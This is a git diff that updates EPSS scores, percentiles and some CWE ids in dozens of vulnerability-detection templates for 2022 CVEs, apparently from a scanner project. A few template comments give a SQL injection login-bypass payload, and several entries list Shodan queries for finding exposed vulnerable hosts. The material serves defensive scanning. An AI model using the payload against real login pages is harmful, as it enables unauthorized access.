- epss-score: 0.01119
+ epss-score: 0.01144
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.82961
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2022/CVE-2022-31980.yaml b/http/cves/2022/CVE-2022-31980.yaml
index 2cb753f92e..8fb6c344a4 100644
--- a/http/cves/2022/CVE-2022-31980.yaml
+++ b/http/cves/2022/CVE-2022-31980.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-31980
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml
index 06ca4cea40..940132f8eb 100644
--- a/http/cves/2022/CVE-2022-31981.yaml
+++ b/http/cves/2022/CVE-2022-31981.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-31981
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2022/CVE-2022-31982.yaml b/http/cves/2022/CVE-2022-31982.yaml
index 99f4140920..1e4310b2f2 100644
--- a/http/cves/2022/CVE-2022-31982.yaml
+++ b/http/cves/2022/CVE-2022-31982.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-31982
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml
index c9aa6077f7..68420a085d 100644
--- a/http/cves/2022/CVE-2022-31983.yaml
+++ b/http/cves/2022/CVE-2022-31983.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-31983
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml
index a93e4ca5eb..f9cb81a968 100644
--- a/http/cves/2022/CVE-2022-31984.yaml
+++ b/http/cves/2022/CVE-2022-31984.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-31984
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2022/CVE-2022-32007.yaml b/http/cves/2022/CVE-2022-32007.yaml
index fc74b4a272..223c1cdcf7 100644
--- a/http/cves/2022/CVE-2022-32007.yaml
+++ b/http/cves/2022/CVE-2022-32007.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-32007
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml
index d86d59ee0a..fab150e70f 100644
--- a/http/cves/2022/CVE-2022-32015.yaml
+++ b/http/cves/2022/CVE-2022-32015.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-32015
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml
index ad036b5447..bbd027dd25 100644
--- a/http/cves/2022/CVE-2022-32018.yaml
+++ b/http/cves/2022/CVE-2022-32018.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-32018
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml
index 4c14fcd2fa..1ca0b0cfb6 100644
--- a/http/cves/2022/CVE-2022-32022.yaml
+++ b/http/cves/2022/CVE-2022-32022.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-32022
cwe-id: CWE-89
- epss-score: 0.00687
+ epss-score: 0.00773
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.79045
metadata:
max-request: 2
shodan-query: http.html:"Car Rental Management System"
diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml
index 9936f4b841..2bdcdb0d2b 100644
--- a/http/cves/2022/CVE-2022-32024.yaml
+++ b/http/cves/2022/CVE-2022-32024.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-32024
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 2
comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username.
diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml
index 4a67aed1e6..ffcae1490b 100644
--- a/http/cves/2022/CVE-2022-32025.yaml
+++ b/http/cves/2022/CVE-2022-32025.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-32025
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 2
comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml
index bdb7ebf992..0fc20e45a4 100644
--- a/http/cves/2022/CVE-2022-32026.yaml
+++ b/http/cves/2022/CVE-2022-32026.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-32026
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 2
comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username.
diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml
index 96755b72c3..ca39e3c5bf 100644
--- a/http/cves/2022/CVE-2022-32028.yaml
+++ b/http/cves/2022/CVE-2022-32028.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-32028
cwe-id: CWE-89
- epss-score: 0.00549
+ epss-score: 0.00618
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.76135
metadata:
max-request: 2
comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml
index e40a384773..a7197b4b71 100644
--- a/http/cves/2022/CVE-2022-32094.yaml
+++ b/http/cves/2022/CVE-2022-32094.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-32094
cwe-id: CWE-89
- epss-score: 0.00974
+ epss-score: 0.01018
cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.81899
metadata:
max-request: 1
shodan-query: http.html:"Hospital Management System"
diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml
index 5535be93d7..5205abbf97 100644
--- a/http/cves/2022/CVE-2022-32195.yaml
+++ b/http/cves/2022/CVE-2022-32195.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:*
+ epss-percentile: 0.4045
metadata:
max-request: 1
comment: Hover the cursor on the redirect link
diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml
index d67862e106..0daed12bb6 100644
--- a/http/cves/2022/CVE-2022-32409.yaml
+++ b/http/cves/2022/CVE-2022-32409.yaml
@@ -13,9 +13,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-32409
- cwe-id: CWE-94
- epss-score: 0.60525
+ cwe-id: CWE-22
+ epss-score: 0.5824
cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*
+ epss-percentile: 0.97277
metadata:
max-request: 1
shodan-query: http.html:"i3geo"
diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml
index 8854e5acf7..26c383f2e1 100644
--- a/http/cves/2022/CVE-2022-32429.yaml
+++ b/http/cves/2022/CVE-2022-32429.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-32429
cwe-id: CWE-287
- epss-score: 0.01391
+ epss-score: 0.02276
cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:*
+ epss-percentile: 0.88224
metadata:
max-request: 1
shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
diff --git a/http/cves/2022/CVE-2022-32444.yaml b/http/cves/2022/CVE-2022-32444.yaml
index 8785a70a48..b9bd66dd54 100644
--- a/http/cves/2022/CVE-2022-32444.yaml
+++ b/http/cves/2022/CVE-2022-32444.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-32444
cwe-id: CWE-601
- epss-score: 0.0021
+ epss-score: 0.00285
cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:*
+ epss-percentile: 0.64698
metadata:
max-request: 1
vendor: yuba
diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml
index 9f3ca80134..03546aa711 100644
--- a/http/cves/2022/CVE-2022-32770.yaml
+++ b/http/cves/2022/CVE-2022-32770.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-32770
cwe-id: CWE-79
- epss-score: 0.00089
+ epss-score: 0.00103
cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:*
+ epss-percentile: 0.41266
metadata:
max-request: 1
shodan-query: http.html:"AVideo"
diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml
index 98d09a8a04..7c42dcfb48 100644
--- a/http/cves/2022/CVE-2022-32771.yaml
+++ b/http/cves/2022/CVE-2022-32771.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-32771
cwe-id: CWE-79
- epss-score: 0.00089
+ epss-score: 0.00056
cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:*
+ epss-percentile: 0.21205
metadata:
max-request: 1
shodan-query: http.html:"AVideo"
diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml
index 39c73f34f1..8dcb8d66f8 100644
--- a/http/cves/2022/CVE-2022-32772.yaml
+++ b/http/cves/2022/CVE-2022-32772.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-32772
cwe-id: CWE-79
- epss-score: 0.00089
+ epss-score: 0.00056
cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:*
+ epss-percentile: 0.21205
metadata:
max-request: 1
shodan-query: http.html:"AVideo"
diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml
index bd34e11644..0d76389343 100644
--- a/http/cves/2022/CVE-2022-33119.yaml
+++ b/http/cves/2022/CVE-2022-33119.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-33119
cwe-id: CWE-79
- epss-score: 0.01722
+ epss-score: 0.02006
cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:*
+ epss-percentile: 0.87424
metadata:
max-request: 1
shodan-query: http.html:"NVRsolo"
diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml
index 7ff24c0af1..0c4b1f8b75 100644
--- a/http/cves/2022/CVE-2022-33174.yaml
+++ b/http/cves/2022/CVE-2022-33174.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-33174
cwe-id: CWE-863
- epss-score: 0.00494
+ epss-score: 0.00505
cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.73487
metadata:
max-request: 1
shodan-query: http.html:"Powertek"
diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml
index 2b069a23de..4fdd1dc3e1 100644
--- a/http/cves/2022/CVE-2022-33891.yaml
+++ b/http/cves/2022/CVE-2022-33891.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-33891
- cwe-id: CWE-77
- epss-score: 0.97072
+ cwe-id: CWE-78
+ epss-score: 0.97023
cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99632
metadata:
max-request: 1
shodan-query: title:"Spark Master at"
diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml
index e05e0c8ec7..5492d38f2d 100644
--- a/http/cves/2022/CVE-2022-33901.yaml
+++ b/http/cves/2022/CVE-2022-33901.yaml
@@ -15,8 +15,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-33901
- epss-score: 0.00884
+ epss-score: 0.00713
cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.78038
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml
index db452e63c7..2236dd244c 100644
--- a/http/cves/2022/CVE-2022-33965.yaml
+++ b/http/cves/2022/CVE-2022-33965.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-33965
cwe-id: CWE-89
- epss-score: 0.01053
+ epss-score: 0.0098
cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.81511
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/wp-stats-manager"
diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml
index 748008c929..af812b5753 100644
--- a/http/cves/2022/CVE-2022-34045.yaml
+++ b/http/cves/2022/CVE-2022-34045.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-34045
cwe-id: CWE-798
- epss-score: 0.01844
+ epss-score: 0.02393
cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*
+ epss-percentile: 0.8849
metadata:
max-request: 1
shodan-query: http.html:"WN530HG4"
diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml
index f8deee1def..c5a44b4e60 100644
--- a/http/cves/2022/CVE-2022-34046.yaml
+++ b/http/cves/2022/CVE-2022-34046.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-34046
cwe-id: CWE-863
- epss-score: 0.25598
+ epss-score: 0.22828
cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*
+ epss-percentile: 0.95888
metadata:
max-request: 1
shodan-query: http.title:"Wi-Fi APP Login"
diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml
index 61ef3f4e70..bd90f7ce7f 100644
--- a/http/cves/2022/CVE-2022-34047.yaml
+++ b/http/cves/2022/CVE-2022-34047.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-34047
cwe-id: CWE-668
- epss-score: 0.27395
+ epss-score: 0.24505
cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*
+ epss-percentile: 0.9601
metadata:
max-request: 1
shodan-query: http.title:"Wi-Fi APP Login"
diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml
index 5a44c8cf00..10dc812f78 100644
--- a/http/cves/2022/CVE-2022-34048.yaml
+++ b/http/cves/2022/CVE-2022-34048.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-34048
cwe-id: CWE-79
- epss-score: 0.00072
+ epss-score: 0.0009
cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*
+ epss-percentile: 0.37601
metadata:
max-request: 1
shodan-query: http.html:"Wavlink"
diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml
index ba547eb14e..c7296ee39c 100644
--- a/http/cves/2022/CVE-2022-34049.yaml
+++ b/http/cves/2022/CVE-2022-34049.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-34049
cwe-id: CWE-552
- epss-score: 0.19026
+ epss-score: 0.17531
cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*
+ epss-percentile: 0.95436
metadata:
max-request: 1
shodan-query: http.title:"Wi-Fi APP Login"
diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml
index 03d058b1f9..e3068e4155 100644
--- a/http/cves/2022/CVE-2022-34121.yaml
+++ b/http/cves/2022/CVE-2022-34121.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-34121
cwe-id: CWE-829
- epss-score: 0.70306
+ epss-score: 0.71421
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.97623
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml
index 2e2556ec8c..84f87b78be 100644
--- a/http/cves/2022/CVE-2022-34328.yaml
+++ b/http/cves/2022/CVE-2022-34328.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-34328
cwe-id: CWE-79
- epss-score: 0.001
+ epss-score: 0.00099
cpe: cpe:2.3:a:pmb_project:pmb:7.3.10:*:*:*:*:*:*:*
+ epss-percentile: 0.40272
metadata:
max-request: 1
shodan-query: http.html:"PMB Group"
diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml
index 6c3d0578ce..ca45419326 100644
--- a/http/cves/2022/CVE-2022-34576.yaml
+++ b/http/cves/2022/CVE-2022-34576.yaml
@@ -13,8 +13,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34576
- epss-score: 0.00853
+ epss-score: 0.01703
cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:*
+ epss-percentile: 0.86191
metadata:
max-request: 1
shodan-query: http.html:"Wavlink"
diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml
index 24b1bb7f58..da0480fc05 100644
--- a/http/cves/2022/CVE-2022-34590.yaml
+++ b/http/cves/2022/CVE-2022-34590.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-34590
cwe-id: CWE-89
- epss-score: 0.00416
+ epss-score: 0.00549
cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.74559
metadata:
max-request: 1
shodan-query: http.html:"Hospital Management System"
diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml
index 57b5d8c1ff..7d76161ca1 100644
--- a/http/cves/2022/CVE-2022-34753.yaml
+++ b/http/cves/2022/CVE-2022-34753.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2022-34753
cwe-id: CWE-78
- epss-score: 0.97087
+ epss-score: 0.97007
cpe: cpe:2.3:o:schneider-electric:spacelogic_c-bus_home_controller_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99625
metadata:
max-request: 1
shodan-query: html:"SpaceLogic C-Bus"
diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml
index 04930419b0..60e1d35a5d 100644
--- a/http/cves/2022/CVE-2022-3484.yaml
+++ b/http/cves/2022/CVE-2022-3484.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.29012
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml
index b4d9d8b66e..a88a926ac6 100644
--- a/http/cves/2022/CVE-2022-3506.yaml
+++ b/http/cves/2022/CVE-2022-3506.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00077
cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.31728
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml
index 1f01f52341..182ce4a23a 100644
--- a/http/cves/2022/CVE-2022-35151.yaml
+++ b/http/cves/2022/CVE-2022-35151.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-35151
cwe-id: CWE-79
- epss-score: 0.01863
+ epss-score: 0.01162
cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.83115
metadata:
max-request: 1
shodan-query: http.html:"kkFileView"
diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml
index 7df3268c3e..821fc78078 100644
--- a/http/cves/2022/CVE-2022-35405.yaml
+++ b/http/cves/2022/CVE-2022-35405.yaml
@@ -16,8 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-35405
- epss-score: 0.97529
+ cwe-id: CWE-502
+ epss-score: 0.97514
cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99972
metadata:
max-request: 1
shodan-query: http.title:"ManageEngine"
diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml
index 396cd114d2..6e0066bfde 100644
--- a/http/cves/2022/CVE-2022-35413.yaml
+++ b/http/cves/2022/CVE-2022-35413.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-35413
cwe-id: CWE-798
- epss-score: 0.8597
+ epss-score: 0.82988
cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97987
metadata:
max-request: 1
shodan-query: http.title:"Intelligent WAPPLES"
diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml
index 5d51f281c8..209a80100c 100644
--- a/http/cves/2022/CVE-2022-35416.yaml
+++ b/http/cves/2022/CVE-2022-35416.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-35416
cwe-id: CWE-79
- epss-score: 0.00078
+ epss-score: 0.00099
cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:*
+ epss-percentile: 0.40272
metadata:
max-request: 1
shodan-query: http.html_hash:510586239
diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml
index 115bcc7e04..42c362c0dd 100644
--- a/http/cves/2022/CVE-2022-35493.yaml
+++ b/http/cves/2022/CVE-2022-35493.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-35493
cwe-id: CWE-79
- epss-score: 0.00099
+ epss-score: 0.00134
cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:*
+ epss-percentile: 0.47885
metadata:
max-request: 1
shodan-query: http.html:"eShop - Multipurpose Ecommerce"
diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml
index 1da4d98fb0..d54c4959c0 100644
--- a/http/cves/2022/CVE-2022-3578.yaml
+++ b/http/cves/2022/CVE-2022-3578.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.29012
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml
index 6483172929..b5a822aea4 100644
--- a/http/cves/2022/CVE-2022-35914.yaml
+++ b/http/cves/2022/CVE-2022-35914.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-35914
cwe-id: CWE-74
- epss-score: 0.97399
+ epss-score: 0.9739
cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9987
metadata:
max-request: 1
shodan-query: http.favicon.hash:"-1474875778"
diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml
index 2fe5eade53..b643a496a5 100644
--- a/http/cves/2022/CVE-2022-36446.yaml
+++ b/http/cves/2022/CVE-2022-36446.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-36446
cwe-id: CWE-116
- epss-score: 0.97188
+ epss-score: 0.97228
cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99749
metadata:
max-request: 2
shodan-query: title:"Webmin"
diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml
index 75709f58d7..352b581f87 100644
--- a/http/cves/2022/CVE-2022-36537.yaml
+++ b/http/cves/2022/CVE-2022-36537.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-36537
cwe-id: CWE-200
- epss-score: 0.96509
+ epss-score: 0.96802
cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99539
metadata:
max-request: 2
shodan-query: http.title:"Server backup manager"
diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml
index 192db46222..9cf183f1b2 100644
--- a/http/cves/2022/CVE-2022-36642.yaml
+++ b/http/cves/2022/CVE-2022-36642.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-36642
cwe-id: CWE-862
- epss-score: 0.7381
+ epss-score: 0.74091
cpe: cpe:2.3:o:telosalliance:omnia_mpx_node_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97696
metadata:
max-request: 2
shodan-query: http.title:"Omnia MPX Node | Login"
diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml
index 93b8bf9268..1c310ff8b2 100644
--- a/http/cves/2022/CVE-2022-36804.yaml
+++ b/http/cves/2022/CVE-2022-36804.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2022-36804
cwe-id: CWE-77
- epss-score: 0.97134
+ epss-score: 0.97338
cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99822
metadata:
max-request: 2
shodan-query: http.component:"BitBucket"
@@ -57,12 +58,14 @@ http:
json:
- '.["values"] | .[] | .["project"] | .key'
